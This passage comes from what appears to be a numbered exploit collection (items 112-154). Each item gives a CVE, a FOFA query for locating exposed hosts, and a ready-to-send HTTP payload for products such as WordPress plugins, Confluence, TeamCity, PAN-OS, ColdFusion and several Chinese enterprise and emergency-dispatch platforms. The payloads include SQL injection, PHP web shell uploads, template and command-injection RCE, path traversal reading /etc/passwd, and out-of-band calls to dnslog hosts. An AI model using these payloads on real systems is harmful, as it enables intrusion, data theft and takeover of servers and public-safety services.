User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
First log in to the system; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; in plain text: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close


123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>


http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc


Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--


128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9


130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp


CVE-2024-27198-RCE.py

133. H5 Cloud Mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--



134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}


135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1


140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1


141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -


142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close


148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}


151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip


153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config


Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
